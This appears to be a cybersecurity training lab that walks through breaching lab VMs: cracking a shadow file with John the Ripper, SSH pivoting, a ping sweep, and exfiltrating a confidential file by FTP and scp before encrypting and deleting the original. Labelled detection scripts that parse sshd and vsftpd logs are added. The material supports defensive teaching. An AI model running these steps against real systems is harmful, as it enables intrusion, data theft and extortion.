Infiltration

What will be an ideal response?


Step 1. Crack the passwords using John the Ripper.
John the Ripper is a tool used to find weak passwords of users. In this step, you will use John
the Ripper to crack weak passwords.
a. From the Kali VM root prompt, verify that the shadow file is in the /root folder on Kali VM.

b. At the root prompt on Kali VM, enter the john command to crack the passwords. Use
the show option to view cracked passwords reliably.
Note: The password cyberops was added to the /usr/share/john/password.lst file to speed up the
password cracking process.
```
root@kali:~# john --show /root/shadow.txt
analyst:cyberops:17338:0:99999:7:::
1 password hash cracked, 7 left
```

After you have cracked the password for the user analyst, you can access Metasploitable
via SSH using the login name analyst.

Step 2. Find the targeted host.
In this step, you will use different commands to find the IP address of a possible host on the
internal network behind the DMZ.

a. Establish an SSH session to the Metasploitable VM. Enter yes to accept the RSA digital
signature when connecting for the first time. Connection may take a few moments.
Enter cyberops as the password when prompted.
```
root@kali:~# ssh analyst@209.165.200.235
analyst@209.165.200.235's password:
```

b. Verify that you have root access to Metasploitable. Enter su -l myroot at the
prompt. Notice that the prompt has changed from analyst@metasploitable to
root@metasploitable.
```
analyst@metasploitable:~$ su -l myroot
root@metasploitable:~#
```

c. Display the /etc/shadow file.
```
root@metasploitable:~# cat /etc/shadow
```

d. Enter exit at the prompt to return to the access privileges of the user analyst.
e. Now display the /etc/shadow file as analyst.
```
analyst@metasploitable:~$ cat /etc/shadow
```
Why did you receive an error message? Record the message and explain.
____________________________________________________________________________
____________________________________________________________________________
____________________________________________________________________________
____________________________________________________________________________
The error message is cat /etc/shadow: Permission denied. Because the /etc/shadow file
is only readable by the owner root and users in the group shadow, the user analyst does
not have permission to read the file, as indicated by the ls -l /etc/shadow command.
It can be read by the user myroot because myroot has root privileges.
f. Enter ifconfig to list all the network interfaces on Metasploitable.
```
analyst@metasploitable:~$ ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:ab:84:07
inet addr:209.165.200.235 Bcast:209.165.200.255
Mask:255.255.255.224
inet6 addr: fe80::a00:27ff:feab:8407/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1610 errors:0 dropped:0 overruns:0 frame:0
TX packets:1550 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:117030 (114.2 KB) TX bytes:123570 (120.6 KB)
Interrupt:10 Base address:0xd020

```

g. Enter ip route to determine the default gateway for this network.
```
analyst@metasploitable:~$ ip route
209.165.200.224/27 dev eth0 proto kernel scope link src 209.165.200.235
default via 209.165.200.226 dev eth0 metric 100
```

What is the default gateway?
____________________________________________________________________________
209.165.200.226

h. In the same terminal window, establish another SSH session to the Security Onion VM
at 209.165.200.226 (eth1 interface) as the user analyst. Enter yes to accept the RSA
digital signature when connecting for the first time. It could take a few moments to
connect. Use the password cyberops when prompted.
```
analyst@metasploitable:~$ ssh analyst@209.165.200.226
```

i. Enter ifconfig to view the list of network interfaces.
```
analyst@SecOnion:~$ ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:c3:cd:8c
inet addr:192.168.0.1 Bcast:192.168.0.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fec3:cd8c/64 Scope:Link
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
RX packets:8 errors:0 dropped:0 overruns:0 frame:0
TX packets:64 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:656 (656.0 B) TX bytes:9377 (9.3 KB)

```

j. You have determined the subnet for the LAN, 192.168.0.0/24. Now you will use a for
loop to determine the active hosts on the LAN. To save time, you will only ping the
first 15 hosts.
```
analyst@SecOnion:~$ for ((i=1;i<15;i+=1)); do ping -c 2 192.168.0.$i; done
PING 192.168.0.1 (192.168.0.1) 56(84) bytes of data.
64 bytes from 192.168.0.1: icmp_seq=1 ttl=64 time=0.067 ms
64 bytes from 192.168.0.1: icmp_seq=2 ttl=64 time=0.027 ms
--- 192.168.0.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 999ms
rtt min/avg/max/mdev = 0.028/0.031/0.034/0.003 ms

PING 192.168.0.11 (192.168.0.11) 56(84) bytes of data.
64 bytes from 192.168.0.11: icmp_seq=1 ttl=64 time=0.606 ms
64 bytes from 192.168.0.11: icmp_seq=2 ttl=64 time=0.262 ms
--- 192.168.0.11 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 999ms
rtt min/avg/max/mdev = 0.262/0.434/0.606/0.172 ms

```

k. Only 192.168.0.1 (Security Onion eth0) and 192.168.0.11 (CyberOps Workstation
VM) are responding to the ping requests. Establish an SSH session into the CyberOps
Workstation VM. Enter yes to accept the RSA digital signature when connecting for
the first time. Enter cyberops as the password.
```
analyst@SecOnion:~$ ssh 192.168.0.11
```
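
The chain of password logins built in Step 2 leaves one sshd entry on every host it passes through. The following is an added example, not part of the original lab, showing how a defender could reconstruct those hops from collected auth logs. The log lines are constructed, the host addresses are the ones shown above, and 203.0.113.10 is a placeholder for the Kali VM, whose address the page does not give.

```shell
#!/usr/bin/env bash
# Constructed sshd log lines (syslog format) gathered from the three lab hosts.
# 203.0.113.10 is a placeholder address for the Kali VM (assumption).
sample_auth_log() {
cat <<'EOF'
Jun 20 10:01:12 metasploitable sshd[4101]: Accepted password for analyst from 203.0.113.10 port 40112 ssh2
Jun 20 10:03:40 SecOnion sshd[2210]: Accepted password for analyst from 209.165.200.235 port 51876 ssh2
Jun 20 10:04:02 SecOnion sshd[2231]: Failed password for analyst from 192.168.0.11 port 40022 ssh2
Jun 20 10:06:55 secOps sshd[913]: Accepted password for analyst from 192.168.0.1 port 38214 ssh2
EOF
}

# Print "user: from -> host" for every accepted password login whose source
# address belongs to a host that had already accepted a login for that user.
# Input must be in time order (hypothetical helper name: find_pivots).
find_pivots() {
  awk '
    BEGIN {
      # address -> hostname, from the ifconfig / ip route output in the lab
      name["209.165.200.235"] = "metasploitable"
      name["209.165.200.226"] = "SecOnion"
      name["192.168.0.1"]     = "SecOnion"
      name["192.168.0.11"]    = "secOps"
    }
    $6 == "Accepted" && $7 == "password" {
      host = $4; user = $9; src = $11
      from = (src in name) ? name[src] : src
      if ((from, user) in landed)       # source host was itself logged into
        print user ": " from " -> " host
      landed[host, user] = 1
    }'
}

# Run only when executed directly, not when sourced.
if [ "${BASH_SOURCE[0]}" = "$0" ]; then
  sample_auth_log | find_pivots
fi
```

Each reported line is a login that originated from a machine the same account had just entered, which is the pattern a server in the DMZ should never produce toward the internal LAN.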

Step 3. Exfiltrate a confidential file.
You now have access to the CyberOps Workstation VM through a series of SSH sessions
(Kali VM > Security Onion VM > CyberOps Workstation VM) using the password that
was cracked in a previous step. Now you will access a confidential file and exfiltrate the
content.

a. Verify that you are in the analyst’s home directory. Change directory to lab.support.files.
```
[analyst@secOps ~]$ cd lab.support.files
```
b. List the files that are in the directory. Verify that confidential.txt file is in the folder.
c. Establish an FTP session to the Metasploitable VM. Use the default user analyst and
enter cyberops as the password.
```
[analyst@secOps lab.support.files]$ ftp 209.165.200.235
Connected to 209.165.200.235.
220 (vsFTPd 2.3.4)
Name (209.165.200.235:analyst): analyst
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
```

d. Upload the confidential.txt file to the Metasploitable VM. Now you have access to the
file and you can move it to the Kali VM for your use if desired.
```
ftp> put confidential.txt
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
103 bytes sent in 0.000104 seconds (41.6 kbytes/s)
```

e. Enter quit when you have finished transferring the file.

Step 4. Encrypt the data and remove the original.
a. Threat actors often will encrypt the confidential data and store it locally, possibly for
ransoming later. Zip the confidential.txt file and encrypt it. Enter cyberops as the
password.
```
[analyst@secOps lab.support.files]$ zip -e confidential.zip confidential.txt
Enter password:
Verify password:
adding: confidential.txt (deflated 4%)
```

b. Remove the confidential.txt file from CyberOps Workstation VM.
```
[analyst@secOps lab.support.files]$ rm confidential.txt
```

c. Enter exit three times until you are back at the root@kali:~# prompt.
d. Now the attacker can copy the file from the FTP on the Metasploitable VM to the Kali
VM. This could take a few moments. Enter the password cyberops when prompted.
```
root@kali:~# scp analyst@209.165.200.235:/home/analyst/confidential.txt ~
analyst@209.165.200.235's password:
confidential.txt 100% 102 102.1KB/s 00:00
```

Note: You can copy the file directly from CyberOps Workstation VM to the Kali VM if there is a user
account other than root configured on Kali VM. Because FTP transmits the content in plaintext, you
will be able to view the content in packets using Wireshark.
e. If desired, you can log back into Metasploitable and remove the file confidential.txt
from the FTP server.
```
root@kali:~# ssh analyst@209.165.200.235
analyst@209.165.200.235's password:
analyst@metasploitable:~$ rm confidential.txt
```

f. At this time, you can shut down Metasploitable, CyberOps Workstation, and Kali virtual
machines.
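
The FTP upload in Step 3 is also recorded by the FTP server itself. The following is an added example, not part of the original lab, of detection logic that flags uploads arriving at the DMZ FTP server from the internal LAN. The log lines are constructed and modelled on vsftpd's native log format, the function names are hypothetical, and 203.0.113.10 is a placeholder outside address.

```shell
#!/usr/bin/env bash
# Constructed lines modelled on vsftpd's native log format (assumption:
# the server logs in this format rather than the wu-ftpd style xferlog).
sample_vsftpd_log() {
cat <<'EOF'
Tue Jun 20 10:09:31 2017 [pid 5120] CONNECT: Client "192.168.0.11"
Tue Jun 20 10:09:36 2017 [pid 5119] [analyst] OK LOGIN: Client "192.168.0.11"
Tue Jun 20 10:09:58 2017 [pid 5121] [analyst] OK UPLOAD: Client "192.168.0.11", "/home/analyst/confidential.txt", 103 bytes, 41.60Kbyte/sec
Tue Jun 20 10:15:02 2017 [pid 5140] [analyst] OK DOWNLOAD: Client "203.0.113.10", "/home/analyst/readme.txt", 512 bytes, 88.10Kbyte/sec
EOF
}

# Report "client user path bytes" for every successful upload whose client is
# in the internal LAN (192.168.0.0/24 in this lab): an inside host pushing a
# file out to the server in the DMZ.
internal_uploads() {
  awk -v lan="192.168.0." '
    / OK UPLOAD: / {
      n = split($0, q, "\"")     # q[2] = client address, q[4] = file path
      if (n >= 5 && index(q[2], lan) == 1) {
        user = $8; gsub(/[][]/, "", user)          # strip [ ] around user
        size = q[5]; sub(/^, /, "", size); sub(/ bytes.*/, "", size)
        print q[2], user, q[4], size
      }
    }'
}

# Run only when executed directly, not when sourced.
if [ "${BASH_SOURCE[0]}" = "$0" ]; then
  sample_vsftpd_log | internal_uploads
fi
```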
